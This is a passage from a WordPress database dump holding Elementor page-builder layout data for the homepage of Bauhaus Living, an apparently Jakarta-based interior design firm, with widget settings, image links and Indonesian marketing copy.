"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4187,4915,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4188,4915,'_elementor_pro_version','3.8.1'),(4189,4916,'_wp_page_template','elementor_header_footer'),(4190,4916,'_elementor_edit_mode','builder'),(4191,4916,'_elementor_template_type','wp-page'),(4192,4916,'_elementor_version','3.8.1'),(4193,4916,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Berikut alasan banyak yang memilih Bauhaus\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis 